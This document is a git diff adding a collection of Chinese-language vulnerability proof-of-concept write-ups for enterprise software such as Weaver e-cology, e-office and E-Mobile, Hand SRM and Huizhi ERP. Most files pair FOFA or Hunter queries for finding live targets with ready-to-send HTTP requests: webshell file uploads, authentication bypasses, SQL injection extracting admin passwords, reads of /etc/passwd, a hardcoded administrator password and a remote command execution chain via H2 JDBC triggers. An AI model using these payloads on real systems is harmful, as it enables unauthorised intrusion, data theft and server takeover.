+Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1721894900847-10896155-e4aa-4f6a-a3e3-cb71ee6773de.png](./img/LRh-q9BuPwVokhJN/1721894900847-10896155-e4aa-4f6a-a3e3-cb71ee6773de-934998.png) + + + +> 更新: 2024-08-12 17:29:10 +> 原文: \ No newline at end of file diff --git a/汇智ERP系统Upload.aspx存在文件上传漏洞.md b/汇智ERP系统Upload.aspx存在文件上传漏洞.md new file mode 100644 index 0000000..3d62979 --- /dev/null +++ b/汇智ERP系统Upload.aspx存在文件上传漏洞.md 
@@ -0,0 +1,62 @@ +# 汇智ERP系统Upload.aspx存在文件上传漏洞 + +汇智企业资源管理系统Upload.aspx存在文件上传漏洞,攻击者可未授权上传webshell木马文件获取服务器权限。 + +## fofa + +```yaml +icon_hash="-642591392" +``` + +## poc + +```java +POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1 +Host: +Content-Length: 1033 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="__VIEWSTATE" + +/wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" + +573D6CFB +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="upfile_Input" + + +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="upfile_upload"; filename="1" +Content-Type: image/jpeg + + + + + ASP.NET Web Forms Example + + + <%@ Page Language="C#" %> + <% Response.Write("hello,world"); %> + + +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="upfilename" + +2.aspx +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="dnpostmethodname" + +uploadfile +------WebKitFormBoundaryLkkAXATqVKBHZ8zk-- +``` + diff --git a/汉得SRM-tomcat.jsp-登录绕过漏洞.md b/汉得SRM-tomcat.jsp-登录绕过漏洞.md new file mode 100644 index 0000000..a1cde20 --- /dev/null +++ b/汉得SRM-tomcat.jsp-登录绕过漏洞.md 
@@ -0,0 +1,6 @@ +## 汉得SRM tomcat.jsp 登录绕过漏洞 +``` +/tomcat.jsp?dataName=role_id&dataValue=1 +/tomcat.jsp?dataName=user_id&dataValue=1 +``` +然后访问后台:/main.screen diff --git a/汉得SRMtomcat.jsp登录绕过漏洞.md b/汉得SRMtomcat.jsp登录绕过漏洞.md new file mode 100644 index 0000000..507e4ed --- /dev/null +++ b/汉得SRMtomcat.jsp登录绕过漏洞.md @@ -0,0 +1,37 @@ +# 汉得SRM tomcat.jsp 登录绕过漏洞 + +# 一、漏洞简介 +汉得SRM云是面向企业采购流程信息化建设的完整解决方案。基于汉得供应商关系管理体系在战略寻源与集中采购、供应链协同和优益采购三大采购管理领域的成功实践,形成了深度契合业务实体的三项组件级解决方案。汉得SRM tomcat.jsp 存在登录绕过漏洞,可绕过身份认证登录后台。 + +# 二、影响版本 ++ 汉得 SRM云平台(Going-Link) + +# 三、资产测绘 ++ hunter:`app.name="汉得 SRM Going-Link"` + +![1691633444395-128795bc-eda8-404c-956d-8147631e5f4f.png](./img/zp0A_yg2AV9HVCoP/1691633444395-128795bc-eda8-404c-956d-8147631e5f4f-852592.png) + ++ 登录页面 + +![1691633633657-ce37893e-1008-4ebd-ba12-5829debf3f3a.png](./img/zp0A_yg2AV9HVCoP/1691633633657-ce37893e-1008-4ebd-ba12-5829debf3f3a-412386.png) + +# 四、漏洞复现 +1. 访问`tomct.jsp` + +```java +/tomcat.jsp?dataName=role_id&dataValue=1 +/tomcat.jsp?dataName=user_id&dataValue=1 +``` + +![1691634374117-f33fbea4-fb74-4443-a8a1-077e4fa58158.png](./img/zp0A_yg2AV9HVCoP/1691634374117-f33fbea4-fb74-4443-a8a1-077e4fa58158-644860.png) + +![1691634393767-677fb789-042e-4e9a-ab69-69f7ba82f2d0.png](./img/zp0A_yg2AV9HVCoP/1691634393767-677fb789-042e-4e9a-ab69-69f7ba82f2d0-860506.png) + +2. 然后访问后台`/main.screen` + +![1691634449862-e80411bc-7175-4b3b-b099-744552207362.png](./img/zp0A_yg2AV9HVCoP/1691634449862-e80411bc-7175-4b3b-b099-744552207362-749194.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: \ No newline at end of file diff --git a/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md b/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md new file mode 100644 index 0000000..5225718 --- /dev/null +++ b/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md 
@@ -0,0 +1,31 @@ +# 江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞 + +# 一、漏洞简介 +江西云本数字科技有限公司总部设立于英雄城南昌,拥有原江西华兴信息产业科技有限公司的原班团队,拥有10年以上的研发、生产、销售智能化公交电子站牌的公交系统服务经验。江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞。 + +# 二、影响版本 ++ 云出行后台管理系统 + +# 三、资产测绘 ++ hunter`web.body="云出行后台管理系统"` ++ 特征 + +![1709867048534-9c791fbf-307d-4514-90eb-f3741ebb4f60.png](./img/wM-ryvOuyAthJJh_/1709867048534-9c791fbf-307d-4514-90eb-f3741ebb4f60-236876.png) + +# 四、漏洞复现 +```plain +/doc/ +``` + +![1709867105816-9f04725c-4813-477f-96e9-1833288e2a63.png](./img/wM-ryvOuyAthJJh_/1709867105816-9f04725c-4813-477f-96e9-1833288e2a63-679337.png) + +```plain +/v1/api-docs +``` + +![1709867173481-02a720bf-9ecc-4855-9e3e-1ad50affe44c.png](./img/wM-ryvOuyAthJJh_/1709867173481-02a720bf-9ecc-4855-9e3e-1ad50affe44c-569884.png) + + + +> 更新: 2024-03-13 23:54:14 +> 原文: \ No newline at end of file diff --git a/泛微-HrmCareerApplyPerView-sql注入漏洞.md b/泛微-HrmCareerApplyPerView-sql注入漏洞.md new file mode 100644 index 0000000..a10da5d --- /dev/null +++ b/泛微-HrmCareerApplyPerView-sql注入漏洞.md @@ -0,0 +1,10 @@ +## 泛微 HrmCareerApplyPerView sql注入漏洞 +``` +GET +/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1 +Host: 127.0.0.1:7443 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) +Accept-Encoding: gzip, deflate +Connection: close + +``` diff --git a/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md b/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md new file mode 100644 index 0000000..3681a1a --- /dev/null +++ b/泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞.md 
@@ -0,0 +1,25 @@ +# 泛微E-Cology9平台QRcodeBuildAction存在身份认证绕过导致SQL注入漏洞 + +由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤,导致攻击者利用多层编码的方式绕过身份认证进行SQL注入。 + +## fofa + +```javascript + app="泛微-OA(e-cology)" +``` + +## poc + +注入点为modeid并且每注入一次就需要更换参数值 + +```javascript +POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Connection: close + +modeid=127+WAITFOR+DELAY+'0%3a0%3a5' +``` + +sqlmap利用方式:https://blog.csdn.net/qq_41904294/article/details/131666128 diff --git a/泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md b/泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md new file mode 100644 index 0000000..f1378b3 --- /dev/null +++ b/泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞 + +泛微E-Cology系统接口CptInstock1Ajax存在SQL注入漏洞,可获取数据库权限,导致数据泄露。 + +## fofa + +```javascript +app="泛微-OA(e-cology)" +``` + +## poc + +```javascript +GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241012130802172](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121308238.png) \ No newline at end of file diff --git a/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md b/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md new file mode 100644 index 0000000..b326f3d --- /dev/null +++ b/泛微E-Mobile硬编码口令漏洞(XVE-2024-28095).md 
@@ -0,0 +1,19 @@ +# 泛微E-Mobile硬编码口令漏洞(XVE-2024-28095) + +泛微E-Mobile 存在硬编码口令漏洞,未经身份验证的远程攻击者可利用该口令以超级管理员身份登录管理后台,导致网站处于极度不安全状态。 + +## fofa + +```javascript +app="泛微-EMobile" +``` + +## poc + +```javascript +账号:msgadmin +密码:Weaver#2012!@# +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272003506.png) + diff --git a/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md b/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md new file mode 100644 index 0000000..8b9218d --- /dev/null +++ b/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md @@ -0,0 +1,33 @@ +# 泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞 + +泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等。 + +## fofa + +```javascript +app="泛微-EMobile" +``` + +## poc + +```javascript +GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +```javascript +GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +``` + +![image-20240919111430590](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191114676.png) \ No newline at end of file diff --git a/泛微E-Office9文件上传漏洞(CVE-2023-2523).md b/泛微E-Office9文件上传漏洞(CVE-2023-2523).md new file mode 100644 index 0000000..fab2f71 --- /dev/null +++ b/泛微E-Office9文件上传漏洞(CVE-2023-2523).md 
@@ -0,0 +1,37 @@ +## 泛微E-Office9文件上传漏洞(CVE-2023-2523) + +## fofa + +```javascript +app="泛微-EOffice" +``` + +## poc +```javascript +POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 +Host: +Content-Length: 349 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 +Connection: close + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +Content-Disposition: form-data; name="upload_quwan"; filename="1.phP" +Content-Type: image/jpeg + + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream + + +------WebKitFormBoundarydRVCGWq4Cx3Sq6tt-- +``` + +![泛微 E-Office_v9.5 mobile_upload_save接口任意文件上传漏洞 POC](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031020316.png) diff --git a/泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md b/泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md new file mode 100644 index 0000000..4db702d --- /dev/null +++ b/泛微e-Mobile移动管理平台error存在远程命令执行漏洞.md 
@@ -0,0 +1,22 @@ +# 泛微e-Mobile移动管理平台error存在远程命令执行漏洞 + +泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台error在远程命令执行漏洞。 + +## hunter +```javascript +app.name="泛微 e-Mobile 移动管理平台" +``` + +## poc +```plain +GET /client/common/error?a=whoami HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1728540551926-c7e783ce-3810-40b8-a311-536332c7ccab.png) + diff --git a/泛微e-cology-v10远程代码执行漏洞.md b/泛微e-cology-v10远程代码执行漏洞.md new file mode 100644 index 0000000..bbcb58d --- /dev/null +++ b/泛微e-cology-v10远程代码执行漏洞.md 
@@ -0,0 +1,114 @@ +# 泛微e-cology-v10远程代码执行漏洞 + +通过e-cology-10.0的/papi/passport/rest/appThirdLogin接口传入管理员账号信息获取票据,系统依赖 H2 数据库且有 JDBC 反序列化漏洞。 + +## fofa + +```yaml +app="泛微-OA(e-cology)" +``` + +## poc + +### 获取serviceTicketId + +```yaml +POST /papi/passport/rest/appThirdLogin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 + +username=sysadmin&service=1&ip=1&loginType=third + + +---- +HTTP/1.1 200 OK +Server: ****** +Content-Type: application/json;charset=UTF-8 +Connection: keep-alive +Date: Tue, 20 Aug 2024 08:39:09 GMT +traceId: f377fe57-0a32-42e8-80f8-91178393ca96 +Set-Cookie: ETEAMS_TGC=TGT521-0L9GdBeMWxijLGMwbnRPEATrA9cHd9pvbaQ4sjcKA9EIgY5cBx; Path=/ +Access-Control-Allow-Headers: X-CSRFToken,Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With,X-File-Name,i18n,token,appkey,userName,password,sw8,eteamsid,traceid,langType,timezoneoffset,authtoken,signature,enableTrans,routePath,tranceid,currentUrl,ebbusinessid,ebBusinessId +Access-Control-Max-Age: 86400 +X-XSS-Protection: 1 +X-Content-Type-Options: nosniff +Content-Length: 179 + +{"success":"true","serviceTicketId":"ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1","message":"登录成功","tgtId":"TGT521-0L9GdBeMWxijLGMwbnRPEATrA9cHd9pvbaQ4sjcKA9EIgY5cBx"} +``` + +### 获取ETEAMSID + +```java +POST /papi/passport/login/generateEteamsId HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 56 + +stTicket=ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1 + + +---- +HTTP/1.1 200 OK +Server: ****** +Content-Type: application/json;charset=UTF-8 +Connection: keep-alive +Date: Tue, 20 Aug 2024 08:41:51 GMT +traceId: d7c16568-6727-4dab-bb87-e8f77ac37703 
+Access-Control-Allow-Headers: X-CSRFToken,Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With,X-File-Name,i18n,token,appkey,userName,password,sw8,eteamsid,traceid,langType,timezoneoffset,authtoken,signature,enableTrans,routePath,tranceid,currentUrl,ebbusinessid,ebBusinessId +Access-Control-Max-Age: 86400 +X-XSS-Protection: 1 +X-Content-Type-Options: nosniff +Content-Length: 114 + +{"code":200,"msg":"接口返回成功","status":true,"data":"THIRD_def423a1574e66bbdb29bc647cd8ccf6","fail":false} +``` + +### 加载org.h2.Driver + +```java +POST /api/bs/iaauthclient/base/save HTTP/1.1 +Host: +Content-Length: 86 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: application/json +Accept: */* +Origin: http://ip +Referer: http://ip/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +ETEAMSID: THIRD_def423a1574e66bbdb29bc647cd8ccf6 + +{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}} +``` + +### 执行命令 + +``` +POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1 +Host: +Content-Length: 199 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: application/json +Accept: */* +Origin: http://ip +Referer: http://ip/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +ETEAMSID: THIRD_18cd45709040d63b6b684d94b5773deb + +{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"{cmd}\")$$"} +``` + +也可以通过上面第一步、第二步获取ETEAMSID值直接进入后台管理页面。 + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/ACe_UhWsdUV3YPhUERcxsg \ No newline at end of file 
diff --git a/泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md b/泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md new file mode 100644 index 0000000..67909a8 --- /dev/null +++ b/泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞.md @@ -0,0 +1,19 @@ +# 泛微e-cology9系统接口FileDownloadLocation接口存在SQL注入漏洞 +泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology 9 x.FileDownloadLocation接口存在SQL注入漏洞 + +## fofa +```javascript +body="doCheckPopupBlocked" +``` + +## poc +```javascript +GET /weaver/weaver.email.FileDownloadLocation/login/LoginSSOxjsp/x.FileDownloadLocation?ddcode=7ea7ef3c41d67297&downfiletype=eml&download=1&mailId=1123+union+select+*+from+(select+1+as+resourceid,'../ecology/WEB-INF/prop/mobilemode.properties'+as+x2,'3'+as+x3,(select++*+from+(select+*+from+(select+password+from+HrmResourceManager+where+id=1)x)x)+as+x4,5+as+x5,6+as+x6)x+where+1=1&mailid=action.WorkflowFnaEffectNew&parentid=0 HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate, br, zstd +Accept: */* +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.0.0 Safari/537.36 +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1734313084568-1d1365df-db66-42e7-b2ca-15e8f0de17bb.png) + diff --git a/泛微e-office-未授权访问.md b/泛微e-office-未授权访问.md new file mode 100644 index 0000000..72c4ed1 --- /dev/null +++ b/泛微e-office-未授权访问.md 
@@ -0,0 +1,57 @@ +## 泛微e-office 未授权访问 + +## fofa +``` +(body="login.php"&&body="eoffice")||body="/general/login/index.php" +icon_hash="1578525679" +``` + +## POC yaml格式 +``` +detail: + ID: 5285 + Author: 匿名作者 + Name: 泛微e-office 未授权访问 + Description: 泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office + 存在未授权访问,攻击者可以访问页面获取敏感信息。 + Identifier: + DVB: DVB-2023-5285 + VulnClass: + - 认证绕过/未认证 + Category: + - 应用服务 + Manufacturer: 泛微 + Product: e-office + Type: 1 + Status: 1 + Scanable: 1 + Level: 2 + DisclosureDate: '2023-10-18' + Is0day: false + IncludeExp: false + Weakable: false + IsXc: false + IsCommon: false + IsCallBack: false + Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php" + Solutions: + - 请关注厂商的修复版本,并及时更新到最新版本. +poc: + relative: req0 + session: false + requests: + - method: GET + timeout: 10 + path: /building/backmgr/urlpage/mobileurl/config_2.php + headers: + User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like + Gecko) Chrome/83.0.2597.132 Safari/537.36 + follow_redirects: true + matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名")) +``` + + +## 漏洞复现 +/building/backmgr/urlpage/mobileurl/config_2.php + +![](./assets/20231020132337.png) diff --git a/泛微e-office系统sms_page.php接口存在sql注入漏洞.md b/泛微e-office系统sms_page.php接口存在sql注入漏洞.md new file mode 100644 index 0000000..e8d3018 --- /dev/null +++ b/泛微e-office系统sms_page.php接口存在sql注入漏洞.md 
@@ -0,0 +1,25 @@ + +# 泛微e-office系统sms_page.php接口存在sql注入漏洞 + +泛微e-office系统在sms_page.php接口下存在sql注入漏洞 + +## fofa + +```javascript +((header="general/login/index.php" || body="/general/login/view//images/updateLoad.gif" || (body="szFeatures" && body="eoffice") || header="Server: eOffice") && body!="Server: couchdb") || banner="general/login/index.php" +``` + +## poc + +```javascript +GET /E-mobile/sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 +Content-Type: application/json +Host: 127.0.0.1 + + +GET /sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1 +Content-Type: application/json +Host: 127.0.0.1 + + +``` diff --git a/泛微ecology9系统接口ModeDateService存在SQL漏洞.md b/泛微ecology9系统接口ModeDateService存在SQL漏洞.md new file mode 100644 index 0000000..b99ce71 --- /dev/null +++ b/泛微ecology9系统接口ModeDateService存在SQL漏洞.md 
@@ -0,0 +1,52 @@ +# 泛微ecology9系统接口ModeDateService存在SQL漏洞 + +泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology9系统ModeDateService存在SQL注入漏洞。 + +## fofa + +```yaml +app="泛微-协同商务系统" +``` + +## hunter + +```yaml +app.name=="泛微 e-cology 9.0 OA" +``` + +## poc + +```java +POST /services/ModeDateService HTTP/1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Referer: http://xxx//services/Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz +Connection: close +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: xxx +Content-Length: 405 + + + + + + 1 + 1 + 1=1 + 1 + + + +``` + +![image-20240822185856455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408221858526.png) + +![image-20240822185904629](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408221859693.png) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/2UkeRDbGaW0JGNQLfGSkRw \ No newline at end of file diff --git a/泛微ecology系统接口BlogService存在SQL注入漏洞.md b/泛微ecology系统接口BlogService存在SQL注入漏洞.md new file mode 100644 index 0000000..7aa0f66 --- /dev/null +++ b/泛微ecology系统接口BlogService存在SQL注入漏洞.md 
@@ -0,0 +1,72 @@ +# 泛微ecology系统接口BlogService存在SQL注入漏洞 + +泛微ecology系统接口`/services/BlogService`存在SQL注入漏洞 + +## fofa + +```yaml +app="泛微-OA(e-cology)" +``` + +## poc + +```java +POST /services/BlogService HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: 192.168.3.139 +Content-Length: 493 + + + + + + 1 + 注入点 + + + + +``` + +```java +POST /services/BlogService HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: 192.168.3.139 +Content-Length: 469 + + + + + + + 1 + + 2 + + 注入点 + + + +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/4mJg0FuOOIBjZn-qTMSaeA \ No newline at end of file diff --git a/泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md b/泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md new file mode 100644 index 0000000..94283b3 --- /dev/null +++ b/泛微云桥-e-Bridge-addTaste接口SQL注入漏洞.md 
@@ -0,0 +1,27 @@ +## 泛微云桥 e-Bridge addTaste接口SQL注入漏洞 + +e-Bridge 提供了一套全面的办公自动化工具,包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞,通过此漏洞攻击者可获取企业数据库敏感数据。 + + +## fofa +``` +app="泛微-云桥e-Bridge" +``` +## hunter +``` +app.name="泛微云桥 e-Bridge OA" +``` + +## poc +``` +GET /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3e3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 +Accept: */* +Cookie: EBRIDGE_JSESSIONID=CAE1276AE2279FD98B96C54DE624CD18; sl-session=BmCjG8ZweGWzoSGpQ1QgQg==; EBRIDGE_JSESSIONID=21D2D790531AD7941D060B411FABDC10 +Accept-Encoding: gzip +SL-CE-SUID: 25 +``` +延迟时间大于5秒 + +![0369e1c147602f35b76105a4f2aebd91](https://github.com/wy876/POC/assets/139549762/0aee421c-131e-4a03-b2d9-c046abdb27f2) diff --git a/泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md b/泛微云桥e-Bridge系统checkMobile存在SQL注入漏洞.md new file mode 100644 index 0000000..f2e6abe --- /dev/null 